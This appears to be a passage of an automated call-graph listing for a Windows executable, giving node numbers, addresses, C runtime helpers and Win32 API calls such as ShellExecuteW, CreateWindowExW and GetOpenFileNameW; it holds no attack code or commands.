86572->86570 86572->86571 86574 41ac7c GetFileType 86572->86574 86578 41aca2 InitializeCriticalSectionAndSpinCount 86572->86578 86573 416b49 __calloc_crt 46 API calls 86573->86575 86574->86572 86575->86569 86575->86572 86575->86573 86579 41abb4 86575->86579 86576 41abe0 GetFileType 86577 41abeb InitializeCriticalSectionAndSpinCount 86576->86577 86576->86579 86577->86569 86577->86579 86578->86569 86578->86572 86579->86572 86579->86576 86579->86577 86581 41f595 86580->86581 86582 41f599 86580->86582 86581->86527 86657 416b04 86582->86657 86584 41f5bb _memmove 86585 41f5c2 FreeEnvironmentStringsW 86584->86585 86585->86527 86587 41f50b _wparse_cmdline 86586->86587 86588 416b04 __malloc_crt 46 API calls 86587->86588 86589 41f54e _wparse_cmdline 86587->86589 86588->86589 86589->86529 86592 41f2bc _wcslen 86590->86592 86595 41f2b4 86590->86595 86591 416b49 __calloc_crt 46 API calls 86597 41f2e0 _wcslen 86591->86597 86592->86591 86593 41f336 86664 413748 86593->86664 86595->86533 86596 416b49 __calloc_crt 46 API calls 86596->86597 86597->86593 86597->86595 86597->86596 86598 41f35c 86597->86598 86601 41f373 86597->86601 86663 41ef12 46 API calls __read_nolock 86597->86663 86599 413748 _free 46 API calls 86598->86599 86599->86595 86670 417ed3 86601->86670 86603 41f37f 86603->86533 86605 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86604->86605 86607 411750 __IsNonwritableInCurrentImage 86605->86607 86689 41130a 51 API calls __cinit 86605->86689 86607->86537 86609 42e2f3 86608->86609 86610 40d6cc 86608->86610 86611 408f40 VariantClear 86610->86611 86612 40d707 86611->86612 86690 40ebb0 86612->86690 86615 40d737 86693 411951 86615->86693 86620 40d751 86705 40f4e0 SystemParametersInfoW SystemParametersInfoW 86620->86705 86622 40d75f 86706 40d590 GetCurrentDirectoryW 86622->86706 86624 40d767 SystemParametersInfoW 86625 40d78d 86624->86625 86626 408f40 VariantClear 86625->86626 86627 40d79d 86626->86627 86628 408f40 VariantClear 86627->86628 86629 40d7a6 86628->86629 86629->86542 86636 4118da 46 API calls _doexit 86629->86636 86630->86515 86631->86519 86636->86542 86637->86545 86638->86553 86639->86561 86642 416b52 86640->86642 86643 416b8f 86642->86643 86644 416b70 Sleep 86642->86644 86648 41f677 86642->86648 86643->86559 86643->86564 86645 416b85 86644->86645 86645->86642 86645->86643 86646->86566 86647->86556 86649 41f683 86648->86649 86654 41f69e _malloc 86648->86654 86650 41f68f 86649->86650 86649->86654 86656 417f77 46 API calls __getptd_noexit 86650->86656 86651 41f6b1 HeapAlloc 86651->86654 86655 41f6d8 86651->86655 86653 41f694 86653->86642 86654->86651 86654->86655 86655->86642 86656->86653 86660 416b0d 86657->86660 86658 4135bb _malloc 45 API calls 86658->86660 86659 416b43 86659->86584 86660->86658 86660->86659 86661 416b24 Sleep 86660->86661 86662 416b39 86661->86662 86662->86659 86662->86660 86663->86597 86665 41377c _free 86664->86665 86666 413753 RtlFreeHeap 86664->86666 86665->86595 86666->86665 86667 413768 86666->86667 86673 417f77 46 API calls __getptd_noexit 86667->86673 86669 41376e GetLastError 86669->86665 86674 417daa 86670->86674 86673->86669 86675 417dc9 __cftoa_l __call_reportfault 86674->86675 86676 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86675->86676 86677 417eb5 __call_reportfault 86676->86677 86680 41a208 86677->86680 86679 417ed1 GetCurrentProcess TerminateProcess 86679->86603 86681 41a210 86680->86681 86682 41a212 IsDebuggerPresent 86680->86682 86681->86679 86688 41fe19 86682->86688 86685 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86686 421ff8 GetCurrentProcess TerminateProcess 86685->86686 86687 421ff0 __call_reportfault 86685->86687 86686->86679 86687->86686 86688->86685 86689->86607 86746 40ebd0 86690->86746 86750 4182cb 86693->86750 86695 41195e 86757 4181f2 LeaveCriticalSection 86695->86757 86697 40d748 86698 4119b0 86697->86698 86699 4119d6 86698->86699 86700 4119bc 86698->86700 86699->86620 86700->86699 86792 417f77 46 API calls __getptd_noexit 86700->86792 86702 4119c6 86793 417f25 10 API calls __read_nolock 86702->86793 86704 4119d1 86704->86620 86705->86622 86794 401f20 86706->86794 86708 40d5b6 IsDebuggerPresent 86709 40d5c4 86708->86709 86710 42e1bb MessageBoxA 86708->86710 86711 42e1d4 86709->86711 86712 40d5e3 86709->86712 86710->86711 86967 403a50 52 API calls 3 library calls 86711->86967 86864 40f520 86712->86864 86716 40d5fd GetFullPathNameW 86876 401460 86716->86876 86718 40d63b 86719 40d643 86718->86719 86721 42e231 SetCurrentDirectoryW 86718->86721 86720 40d64c 86719->86720 86968 432fee 6 API calls 86719->86968 86891 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86720->86891 86721->86719 86725 42e252 86725->86720 86726 42e25a GetModuleFileNameW 86725->86726 86728 42e274 86726->86728 86729 42e2cb GetForegroundWindow ShellExecuteW 86726->86729 86969 401b10 86728->86969 86733 40d688 86729->86733 86730 40d656 86732 40d669 86730->86732 86965 40e0c0 74 API calls __cftoa_l 86730->86965 86899 4091e0 86732->86899 86739 40d692 SetCurrentDirectoryW 86733->86739 86739->86624 86740 42e28d 86976 40d200 52 API calls 2 library calls 86740->86976 86743 42e299 GetForegroundWindow ShellExecuteW 86744 42e2c6 86743->86744 86744->86733 86745 40ec00 LoadLibraryA GetProcAddress 86745->86615 86747 40d72e 86746->86747 86748 40ebd6 LoadLibraryA 86746->86748 86747->86615 86747->86745 86748->86747 86749 40ebe7 GetProcAddress 86748->86749 86749->86747 86751 4182e0 86750->86751 86752 4182f3 EnterCriticalSection 86750->86752 86758 418209 86751->86758 86752->86695 86754 4182e6 86754->86752 86785 411924 46 API calls 3 library calls 86754->86785 86757->86697 86759 418215 _flsall 86758->86759 86760 418225 86759->86760 86761 41823d 86759->86761 86786 418901 46 API calls __NMSG_WRITE 86760->86786 86763 416b04 __malloc_crt 45 API calls 86761->86763 86774 41824b _flsall 86761->86774 86766 418256 86763->86766 86764 41822a 86787 418752 46 API calls 7 library calls 86764->86787 86768 41825d 86766->86768 86769 41826c 86766->86769 86767 418231 86788 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86767->86788 86789 417f77 46 API calls __getptd_noexit 86768->86789 86772 4182cb __lock 45 API calls 86769->86772 86775 418273 86772->86775 86774->86754 86776 4182a6 86775->86776 86777 41827b InitializeCriticalSectionAndSpinCount 86775->86777 86780 413748 _free 45 API calls 86776->86780 86778 418297 86777->86778 86779 41828b 86777->86779 86791 4182c2 LeaveCriticalSection _doexit 86778->86791 86781 413748 _free 45 API calls 86779->86781 86780->86778 86782 418291 86781->86782 86790 417f77 46 API calls __getptd_noexit 86782->86790 86786->86764 86787->86767 86789->86774 86790->86778 86791->86774 86792->86702 86793->86704 86977 40e6e0 86794->86977 86798 401f41 GetModuleFileNameW 86995 410100 86798->86995 86800 401f5c 87007 410960 86800->87007 86803 401b10 52 API calls 86804 401f81 86803->86804 86805 401980 53 API calls 86804->86805 86806 401f8e 86805->86806 86807 408f40 VariantClear 86806->86807 86808 401f9d 86807->86808 86809 401b10 52 API calls 86808->86809 86810 401fb4 86809->86810 86811 401980 53 API calls 86810->86811 86812 401fc3 86811->86812 86813 401b10 52 API calls 86812->86813 86814 401fd2 86813->86814 87010 40c2c0 86814->87010 86816 401fe1 86817 40bc70 52 API calls 86816->86817 86818 401ff3 86817->86818 87028 401a10 86818->87028 86820 401ffe 87035 4114ab 86820->87035 86823 428b05 86825 401a10 52 API calls 86823->86825 86824 402017 86826 4114ab __wcsicoll 58 API calls 86824->86826 86827 428b18 86825->86827 86828 402022 86826->86828 86830 401a10 52 API calls 86827->86830 86828->86827 86829 40202d 86828->86829 86831 4114ab __wcsicoll 58 API calls 86829->86831 86832 428b33 86830->86832 86833 402038 86831->86833 86835 428b3b GetModuleFileNameW 86832->86835 86834 402043 86833->86834 86833->86835 86836 4114ab __wcsicoll 58 API calls 86834->86836 86837 401a10 52 API calls 86835->86837 86838 40204e 86836->86838 86839 428b6c 86837->86839 86840 402092 86838->86840 86843 428b90 _wcscpy 86838->86843 86846 401a10 52 API calls 86838->86846 86841 40e0a0 52 API calls 86839->86841 86842 4020a3 86840->86842 86840->86843 86844 428b7a 86841->86844 86845 428bc6 86842->86845 86849 40e830 53 API calls 86842->86849 86851 401a10 52 API calls 86843->86851 86847 401a10 52 API calls 86844->86847 86850 402073 _wcscpy 86846->86850 86848 428b88 86847->86848 86848->86843 86852 4020bb 86849->86852 86854 401a10 52 API calls 86850->86854 86859 4020d0 86851->86859 87043 40cf00 86852->87043 86854->86840 86855 4020c6 86856 408f40 VariantClear 86855->86856 86856->86859 86857 402110 86861 408f40 VariantClear 86857->86861 86858 40cf00 53 API calls 86858->86859 86859->86857 86859->86858 86862 401a10 52 API calls 86859->86862 87056 40e6a0 53 API calls 86859->87056 86863 402120 moneypunct 86861->86863 86862->86859 86863->86708 86865 4295c9 __cftoa_l 86864->86865 86866 40f53c 86864->86866 86868 4295d9 GetOpenFileNameW 86865->86868 87801 410120 86866->87801 86868->86866 86871 40d5f5 86868->86871 86869 40f545 87805 4102b0 SHGetMalloc 86869->87805 86871->86716 86871->86718 86872 40f54c 87810 410190 GetFullPathNameW 86872->87810 86874 40f559 87821 40f570 86874->87821 87863 402400 86876->87863 86878 40146f 86881 428c29 _wcscat 86878->86881 87872 401500 86878->87872 86880 40147c 86880->86881 87880 40d440 86880->87880 86883 401489 86883->86881 86884 401491 GetFullPathNameW 86883->86884 86885 402160 52 API calls 86884->86885 86886 4014bb 86885->86886 86887 402160 52 API calls 86886->86887 86888 4014c8 86887->86888 86888->86881 86889 402160 52 API calls 86888->86889 86890 4014ee 86889->86890 86890->86718 86892 428361 86891->86892 86893 4103fc LoadImageW RegisterClassExW 86891->86893 87956 44395e EnumResourceNamesW LoadImageW 86892->87956 87955 410490 7 API calls 86893->87955 86896 428368 86897 40d651 86898 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86897->86898 86898->86730 86900 409202 86899->86900 86901 42d7ad 86899->86901 86926 409216 moneypunct 86900->86926 88219 410940 398 API calls 86900->88219 88222 45e737 90 API calls 3 library calls 86901->88222 86904 409386 86905 40939c 86904->86905 88220 40f190 10 API calls 86904->88220 86905->86733 86966 401000 Shell_NotifyIconW __cftoa_l 86905->86966 86907 4095b2 86907->86905 86908 4095bf 86907->86908 88221 401a50 398 API calls 86908->88221 86909 409253 PeekMessageW 86909->86926 86911 40d410 VariantClear 86911->86926 86912 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86912->86905 86914 4095f9 86912->86914 86913 42d8cd Sleep 86913->86926 86918 42e158 TranslateMessage DispatchMessageW GetMessageW 86914->86918 86916 42e13b 88240 40d410 VariantClear 86916->88240 86918->86918 86922 42e188 86918->86922 86920 409567 PeekMessageW 86920->86926 86921 4094e0 86925 44c29d 52 API calls 86921->86925 86921->86926 86929 46fdbf 108 API calls 86921->86929 86942 40c620 timeGetTime 86921->86942 86945 465124 53 API calls 86921->86945 86946 42dd89 CloseHandle 86921->86946 86949 408f40 VariantClear 86921->86949 86950 42de19 GetExitCodeProcess CloseHandle 86921->86950 86954 42de88 Sleep 86921->86954 86962 401980 53 API calls 86921->86962 86963 401b10 52 API calls 86921->86963 88226 45178a 54 API calls 86921->88226 88227 47d33e 398 API calls 86921->88227 88228 453bc6 54 API calls 86921->88228 88230 40d410 VariantClear 86921->88230 88231 443d19 67 API calls _wcslen 86921->88231 88232 4574b4 VariantClear 86921->88232 88233 403cd0 86921->88233 88237 4731e1 VariantClear 86921->88237 88238 4331a2 6 API calls 86921->88238 86922->86905 86925->86921 86926->86904 86926->86909 86926->86911 86926->86913 86926->86916 86926->86920 86926->86921 86927 46f3c1 107 API calls 86926->86927 86928 40e0a0 52 API calls 86926->86928 86930 409551 TranslateMessage DispatchMessageW 86926->86930 86932 42dcd2 WaitForSingleObject 86926->86932 86935 42dd3d Sleep 86926->86935 86938 4094cf Sleep 86926->86938 86940 42d94d timeGetTime 86926->86940 86947 47d33e 376 API calls 86926->86947 86958 42e0cc VariantClear 86926->86958 86959 45e737 90 API calls 86926->86959 86960 408f40 VariantClear 86926->86960 87957 4091b0 86926->87957 88015 40afa0 86926->88015 88041 408fc0 86926->88041 88076 408cc0 86926->88076 88090 4096a0 86926->88090 88217 40d150 TranslateAcceleratorW 86926->88217 88218 40d170 IsDialogMessageW GetClassLongW 86926->88218 88223 465124 53 API calls 86926->88223 88224 40c620 timeGetTime 86926->88224 88239 40e270 VariantClear moneypunct 86926->88239 86927->86926 86928->86926 86929->86921 86930->86920 86932->86926 86933 42dcf0 GetExitCodeProcess CloseHandle 86932->86933 88229 40d410 VariantClear 86933->88229 86935->86921 86938->86921 88225 465124 53 API calls 86940->88225 86942->86921 86945->86921 86946->86921 86947->86926 86949->86921 86950->86921 86954->86926 86958->86926 86959->86926 86960->86926 86962->86921 86963->86921 86965->86732 86966->86733 86967->86718 86968->86725 86970 401b16 _wcslen 86969->86970 86971 4115d7 52 API calls 86970->86971 86972 401b63 86970->86972 86973 401b4b _memmove 86971->86973 86975 40d200 52 API calls 2 library calls 86972->86975 86974 4115d7 52 API calls 86973->86974 86974->86972 86975->86740 86976->86743 86978 40bc70 52 API calls 86977->86978 86979 401f31 86978->86979 86980 402560 86979->86980 86981 40256d __write_nolock 86980->86981 86982 402160 52 API calls 86981->86982 86984 402593 86982->86984 86987 4025bd 86984->86987 87057 401c90 86984->87057 86985 4026f0 52 API calls 86985->86987 86986 4026a7 86988 401b10 52 API calls 86986->86988 86993 4026db 86986->86993 86987->86985 86987->86986 86990 401b10 52 API calls 86987->86990 86994 401c90 52 API calls 86987->86994 87060 40d7c0 52 API calls 2 library calls 86987->87060 86989 4026d1 86988->86989 87061 40d7c0 52 API calls 2 library calls 86989->87061 86990->86987 86993->86798 86994->86987 87062 40f760 86995->87062 86998 410118 86998->86800 87000 42805d 87001 42806a 87000->87001 87118 431e58 87000->87118 87002 413748 _free 46 API calls 87001->87002 87004 428078 87002->87004 87005 431e58 82 API calls 87004->87005 87006 428084 87005->87006 87006->86800 87008 4115d7 52 API calls 87007->87008 87009 401f74 87008->87009 87009->86803 87011 40c2c7 87010->87011 87012 40c30e 87010->87012 87013 40c2d3 87011->87013 87014 426c79 87011->87014 87015 40c315 87012->87015 87016 426c2b 87012->87016 87788 403ea0 52 API calls __cinit 87013->87788 87793 4534e3 52 API calls 87014->87793 87020 40c321 87015->87020 87021 426c5a 87015->87021 87018 426c4b 87016->87018 87019 426c2e 87016->87019 87791 4534e3 52 API calls 87018->87791 87026 40c2de 87019->87026 87790 4534e3 52 API calls 87019->87790 87789 403ea0 52 API calls __cinit 87020->87789 87792 4534e3 52 API calls 87021->87792 87026->86816 87029 401a30 87028->87029 87030 401a17 87028->87030 87032 402160 52 API calls 87029->87032 87031 401a2d 87030->87031 87794 403c30 52 API calls _memmove 87030->87794 87031->86820 87034 401a3d 87032->87034 87034->86820 87036 411523 87035->87036 87037 4114ba 87035->87037 87797 4113a8 58 API calls 3 library calls 87036->87797 87040 40200c 87037->87040 87795 417f77 46 API calls __getptd_noexit 87037->87795 87040->86823 87040->86824 87041 4114c6 87796 417f25 10 API calls __read_nolock 87041->87796 87044 428ac6 87043->87044 87045 40cf0e 87043->87045 87044->86855 87046 40cf19 87045->87046 87798 40e810 52 API calls 87045->87798 87049 40cf1d 87046->87049 87800 40e950 53 API calls 87046->87800 87050 40cf38 87049->87050 87051 4115d7 52 API calls 87049->87051 87050->86855 87052 40cf88 87051->87052 87053 40cfaa 87052->87053 87799 40d290 52 API calls 87052->87799 87053->86855 87055 40cf96 87055->86855 87056->86859 87058 4026f0 52 API calls 87057->87058 87059 401c97 87058->87059 87059->86984 87060->86987 87061->86993 87122 40f6f0 87062->87122 87064 40f77b _strcat moneypunct 87130 40f850 87064->87130 87069 427c2a 87160 414d04 87069->87160 87071 40f7fc 87071->87069 87073 40f804 87071->87073 87147 414a46 87073->87147 87077 40f80e 87077->86998 87081 4528bd 87077->87081 87078 427c59 87166 414fe2 87078->87166 87080 427c79 87082 4150d1 _fseek 81 API calls 87081->87082 87083 452930 87082->87083 87690 452719 87083->87690 87086 452948 87086->87000 87087 414d04 __fread_nolock 61 API calls 87088 452966 87087->87088 87089 414d04 __fread_nolock 61 API calls 87088->87089 87090 452976 87089->87090 87091 414d04 __fread_nolock 61 API calls 87090->87091 87092 45298f 87091->87092 87093 414d04 __fread_nolock 61 API calls 87092->87093 87094 4529aa 87093->87094 87095 4150d1 _fseek 81 API calls 87094->87095 87096 4529c4 87095->87096 87097 4135bb _malloc 46 API calls 87096->87097 87098 4529cf 87097->87098 87099 4135bb _malloc 46 API calls 87098->87099 87100 4529db 87099->87100 87101 414d04 __fread_nolock 61 API calls 87100->87101 87102 4529ec 87101->87102 87103 44afef GetSystemTimeAsFileTime 87102->87103 87104 452a00 87103->87104 87105 452a36 87104->87105 87106 452a13 87104->87106 87108 452aa5 87105->87108 87109 452a3c 87105->87109 87107 413748 _free 46 API calls 87106->87107 87111 452a1c 87107->87111 87110 413748 _free 46 API calls 87108->87110 87696 44b1a9 87109->87696 87113 452aa3 87110->87113 87114 413748 _free 46 API calls 87111->87114 87113->87000 87116 452a25 87114->87116 87115 452a9d 87117 413748 _free 46 API calls 87115->87117 87116->87000 87117->87113 87119 431e64 87118->87119 87120 431e6a 87118->87120 87121 414a46 __fcloseall 82 API calls 87119->87121 87120->87001 87121->87120 87123 425de2 87122->87123 87124 40f6fc _wcslen 87122->87124 87123->87064 87125 40f710 WideCharToMultiByte 87124->87125 87126 40f756 87125->87126 87127 40f728 87125->87127 87126->87064 87128 4115d7 52 API calls 87127->87128 87129 40f735 WideCharToMultiByte 87128->87129 87129->87064 87133 40f85d __cftoa_l _strlen 87130->87133 87131 426b3b 87133->87131 87134 40f7ab 87133->87134 87179 414db8 87133->87179 87135 4149c2 87134->87135 87194 414904 87135->87194 87137 40f7e9 87137->87069 87138 40f5c0 87137->87138 87139 40f5cd _strcat __write_nolock _memmove 87138->87139 87140 414d04 __fread_nolock 61 API calls 87139->87140 87142 425d11 87139->87142 87146 40f691 __tzset_nolock 87139->87146 87282 4150d1 87139->87282 87140->87139 87143 4150d1 _fseek 81 API calls 87142->87143 87144 425d33 87143->87144 87145 414d04 __fread_nolock 61 API calls 87144->87145 87145->87146 87146->87071 87148 414a52 _flsall 87147->87148 87149 414a64 87148->87149 87151 414a79 87148->87151 87446 417f77 46 API calls __getptd_noexit 87149->87446 87152 415471 __lock_file 47 API calls 87151->87152 87156 414a74 _flsall 87151->87156 87154 414a92 87152->87154 87153 414a69 87447 417f25 10 API calls __read_nolock 87153->87447 87430 4149d9 87154->87430 87156->87077 87515 414c76 87160->87515 87162 414d1c 87163 44afef 87162->87163 87683 442c5a 87163->87683 87165 44b00d 87165->87078 87167 414fee _flsall 87166->87167 87168 414ffa 87167->87168 87169 41500f 87167->87169 87687 417f77 46 API calls __getptd_noexit 87168->87687 87171 415471 __lock_file 47 API calls 87169->87171 87173 415017 87171->87173 87172 414fff 87688 417f25 10 API calls __read_nolock 87172->87688 87175 414e4e __ftell_nolock 51 API calls 87173->87175 87176 415024 87175->87176 87689 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87176->87689 87178 41500a _flsall 87178->87080 87180 414dd6 87179->87180 87181 414deb 87179->87181 87190 417f77 46 API calls __getptd_noexit 87180->87190 87181->87180 87182 414df2 87181->87182 87192 41b91b 79 API calls 12 library calls 87182->87192 87185 414ddb 87191 417f25 10 API calls __read_nolock 87185->87191 87187 414de6 87187->87133 87188 414e18 87188->87187 87193 418f98 77 API calls 7 library calls 87188->87193 87190->87185 87191->87187 87192->87188 87193->87187 87197 414910 _flsall 87194->87197 87195 414923 87250 417f77 46 API calls __getptd_noexit 87195->87250 87197->87195 87199 414951 87197->87199 87198 414928 87251 417f25 10 API calls __read_nolock 87198->87251 87213 41d4d1 87199->87213 87202 414956 87203 41496a 87202->87203 87204 41495d 87202->87204 87206 414992 87203->87206 87207 414972 87203->87207 87252 417f77 46 API calls __getptd_noexit 87204->87252 87230 41d218 87206->87230 87253 417f77 46 API calls __getptd_noexit 87207->87253 87210 414933 _flsall @_EH4_CallFilterFunc@8 87210->87137 87214 41d4dd _flsall 87213->87214 87215 4182cb __lock 46 API calls 87214->87215 87228 41d4eb 87215->87228 87216 41d560 87255 41d5fb 87216->87255 87217 41d567 87219 416b04 __malloc_crt 46 API calls 87217->87219 87221 41d56e 87219->87221 87220 41d5f0 _flsall 87220->87202 87221->87216 87222 41d57c InitializeCriticalSectionAndSpinCount 87221->87222 87225 41d59c 87222->87225 87226 41d5af EnterCriticalSection 87222->87226 87223 418209 __mtinitlocknum 46 API calls 87223->87228 87227 413748 _free 46 API calls 87225->87227 87226->87216 87227->87216 87228->87216 87228->87217 87228->87223 87258 4154b2 47 API calls __lock 87228->87258 87259 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87228->87259 87231 41d23a 87230->87231 87232 41d255 87231->87232 87244 41d26c __wopenfile 87231->87244 87264 417f77 46 API calls __getptd_noexit 87232->87264 87234 41d421 87237 41d47a 87234->87237 87238 41d48c 87234->87238 87235 41d25a 87265 417f25 10 API calls __read_nolock 87235->87265 87269 417f77 46 API calls __getptd_noexit 87237->87269 87261 422bf9 87238->87261 87241 41499d 87254 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87241->87254 87242 41d47f 87270 417f25 10 API calls __read_nolock 87242->87270 87244->87234 87244->87237 87244->87244 87266 41341f 58 API calls 2 library calls 87244->87266 87246 41d41a 87246->87234 87267 41341f 58 API calls 2 library calls 87246->87267 87248 41d439 87248->87234 87268 41341f 58 API calls 2 library calls 87248->87268 87250->87198 87251->87210 87252->87210 87253->87210 87254->87210 87260 4181f2 LeaveCriticalSection 87255->87260 87257 41d602 87257->87220 87258->87228 87259->87228 87260->87257 87271 422b35 87261->87271 87263 422c14 87263->87241 87264->87235 87265->87241 87266->87246 87267->87248 87268->87234 87269->87242 87270->87241 87274 422b41 _flsall 87271->87274 87272 422b54 87273 417f77 __read_nolock 46 API calls 87272->87273 87275 422b59 87273->87275 87274->87272 87276 422b8a 87274->87276 87277 417f25 __read_nolock 10 API calls 87275->87277 87278 422400 __tsopen_nolock 109 API calls 87276->87278 87281 422b63 _flsall 87277->87281 87279 422ba4 87278->87279 87280 422bcb __wsopen_helper LeaveCriticalSection 87279->87280 87280->87281 87281->87263 87284 4150dd _flsall 87282->87284 87283 4150e9 87313 417f77 46 API calls __getptd_noexit 87283->87313 87284->87283 87285 41510f 87284->87285 87295 415471 87285->87295 87288 4150ee 87314 417f25 10 API calls __read_nolock 87288->87314 87294 4150f9 _flsall 87294->87139 87296 415483 87295->87296 87297 4154a5 EnterCriticalSection 87295->87297 87296->87297 87299 41548b 87296->87299 87298 415117 87297->87298 87301 415047 87298->87301 87300 4182cb __lock 46 API calls 87299->87300 87300->87298 87302 415067 87301->87302 87303 415057 87301->87303 87308 415079 87302->87308 87316 414e4e 87302->87316 87371 417f77 46 API calls __getptd_noexit 87303->87371 87307 41505c 87315 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87307->87315 87333 41443c 87308->87333 87311 4150b9 87346 41e1f4 87311->87346 87313->87288 87314->87294 87315->87294 87317 414e61 87316->87317 87318 414e79 87316->87318 87372 417f77 46 API calls __getptd_noexit 87317->87372 87320 414139 __fflush_nolock 46 API calls 87318->87320 87322 414e80 87320->87322 87321 414e66 87373 417f25 10 API calls __read_nolock 87321->87373 87324 41e1f4 __write 51 API calls 87322->87324 87325 414e97 87324->87325 87326 414f09 87325->87326 87328 414ec9 87325->87328 87332 414e71 87325->87332 87374 417f77 46 API calls __getptd_noexit 87326->87374 87329 41e1f4 __write 51 API calls 87328->87329 87328->87332 87330 414f64 87329->87330 87331 41e1f4 __write 51 API calls 87330->87331 87330->87332 87331->87332 87332->87308 87334 414455 87333->87334 87338 414477 87333->87338 87335 414139 __fflush_nolock 46 API calls 87334->87335 87334->87338 87336 414470 87335->87336 87375 41b7b2 87336->87375 87339 414139 87338->87339 87340 414145 87339->87340 87341 41415a 87339->87341 87400 417f77 46 API calls __getptd_noexit 87340->87400 87341->87311 87343 41414a 87401 417f25 10 API calls __read_nolock 87343->87401 87345 414155 87345->87311 87347 41e200 _flsall 87346->87347 87348 41e223 87347->87348 87349 41e208 87347->87349 87350 41e22f 87348->87350 87356 41e269 87348->87356 87422 417f8a 46 API calls __getptd_noexit 87349->87422 87424 417f8a 46 API calls __getptd_noexit 87350->87424 87353 41e20d 87423 417f77 46 API calls __getptd_noexit 87353->87423 87355 41e234 87425 417f77 46 API calls __getptd_noexit 87355->87425 87402 41ae56 87356->87402 87359 41e23c 87426 417f25 10 API calls __read_nolock 87359->87426 87360 41e26f 87361 41e291 87360->87361 87362 41e27d 87360->87362 87427 417f77 46 API calls __getptd_noexit 87361->87427 87412 41e17f 87362->87412 87366 41e215 _flsall 87366->87307 87367 41e289 87429 41e2c0 LeaveCriticalSection __unlock_fhandle 87367->87429 87368 41e296 87428 417f8a 46 API calls __getptd_noexit 87368->87428 87371->87307 87372->87321 87373->87332 87374->87332 87376 41b7be _flsall 87375->87376 87377 41b7e1 87376->87377 87378 41b7c6 87376->87378 87380 41b7ed 87377->87380 87384 41b827 87377->87384 87379 417f8a __read_nolock 46 API calls 87378->87379 87381 41b7cb 87379->87381 87382 417f8a __read_nolock 46 API calls 87380->87382 87385 417f77 __read_nolock 46 API calls 87381->87385 87383 41b7f2 87382->87383 87386 417f77 __read_nolock 46 API calls 87383->87386 87387 41ae56 ___lock_fhandle 48 API calls 87384->87387 87388 41b7d3 _flsall 87385->87388 87389 41b7fa 87386->87389 87390 41b82d 87387->87390 87388->87338 87391 417f25 __read_nolock 10 API calls 87389->87391 87392 41b83b 87390->87392 87393 41b84f 87390->87393 87391->87388 87394 41b0b5 __write_nolock 74 API calls 87392->87394 87395 417f77 __read_nolock 46 API calls 87393->87395 87397 41b847 87394->87397 87396 41b854 87395->87396 87398 417f8a __read_nolock 46 API calls 87396->87398 87399 41b87e __write LeaveCriticalSection 87397->87399 87398->87397 87399->87388 87400->87343 87401->87345 87403 41ae62 _flsall 87402->87403 87404 41aebc 87403->87404 87406 4182cb __lock 46 API calls 87403->87406 87405 41aec1 EnterCriticalSection 87404->87405 87407 41aede _flsall 87404->87407 87405->87407 87408 41ae8e 87406->87408 87407->87360 87409 41aeaa 87408->87409 87410 41ae97 InitializeCriticalSectionAndSpinCount 87408->87410 87411 41aeec ___lock_fhandle LeaveCriticalSection 87409->87411 87410->87409 87411->87404 87413 41aded __chsize_nolock 46 API calls 87412->87413 87414 41e18e 87413->87414 87415 41e1a4 SetFilePointer 87414->87415 87416 41e194 87414->87416 87418 41e1c3 87415->87418 87419 41e1bb GetLastError 87415->87419 87417 417f77 __read_nolock 46 API calls 87416->87417 87421 41e199 87417->87421 87420 417f9d __dosmaperr 46 API calls 87418->87420 87418->87421 87419->87418 87420->87421 87421->87367 87422->87353 87423->87366 87424->87355 87425->87359 87426->87366 87427->87368 87428->87367 87429->87366 87431 4149ea 87430->87431 87432 4149fe 87430->87432 87476 417f77 46 API calls __getptd_noexit 87431->87476 87434 4149fa 87432->87434 87436 41443c __flush 77 API calls 87432->87436 87448 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87434->87448 87435 4149ef 87477 417f25 10 API calls __read_nolock 87435->87477 87438 414a0a 87436->87438 87449 41d8c2 87438->87449 87441 414139 __fflush_nolock 46 API calls 87442 414a18 87441->87442 87453 41d7fe 87442->87453 87444 414a1e 87444->87434 87445 413748 _free 46 API calls 87444->87445 87445->87434 87446->87153 87447->87156 87448->87156 87450 414a12 87449->87450 87451 41d8d2 87449->87451 87450->87441 87451->87450 87452 413748 _free 46 API calls 87451->87452 87452->87450 87454 41d80a _flsall 87453->87454 87455 41d812 87454->87455 87456 41d82d 87454->87456 87493 417f8a 46 API calls __getptd_noexit 87455->87493 87458 41d839 87456->87458 87462 41d873 87456->87462 87495 417f8a 46 API calls __getptd_noexit 87458->87495 87460 41d817 87494 417f77 46 API calls __getptd_noexit 87460->87494 87461 41d83e 87496 417f77 46 API calls __getptd_noexit 87461->87496 87465 41ae56 ___lock_fhandle 48 API calls 87462->87465 87468 41d879 87465->87468 87466 41d81f _flsall 87466->87444 87467 41d846 87497 417f25 10 API calls __read_nolock 87467->87497 87470 41d893 87468->87470 87471 41d887 87468->87471 87498 417f77 46 API calls __getptd_noexit 87470->87498 87478 41d762 87471->87478 87474 41d88d 87499 41d8ba LeaveCriticalSection __unlock_fhandle 87474->87499 87476->87435 87477->87434 87500 41aded 87478->87500 87480 41d7c8 87513 41ad67 47 API calls __read_nolock 87480->87513 87481 41d772 87481->87480 87483 41aded __chsize_nolock 46 API calls 87481->87483 87492 41d7a6 87481->87492 87486 41d79d 87483->87486 87484 41aded __chsize_nolock 46 API calls 87487 41d7b2 CloseHandle 87484->87487 87485 41d7d0 87489 41d7f2 87485->87489 87514 417f9d 46 API calls 2 library calls 87485->87514 87490 41aded __chsize_nolock 46 API calls 87486->87490 87487->87480 87491 41d7be GetLastError 87487->87491 87489->87474 87490->87492 87491->87480 87492->87480 87492->87484 87493->87460 87494->87466 87495->87461 87496->87467 87497->87466 87498->87474 87499->87466 87501 41ae12 87500->87501 87502 41adfa 87500->87502 87505 417f8a __read_nolock 46 API calls 87501->87505 87506 41ae51 87501->87506 87503 417f8a __read_nolock 46 API calls 87502->87503 87504 41adff 87503->87504 87507 417f77 __read_nolock 46 API calls 87504->87507 87508 41ae23 87505->87508 87506->87481 87510 41ae07 87507->87510 87509 417f77 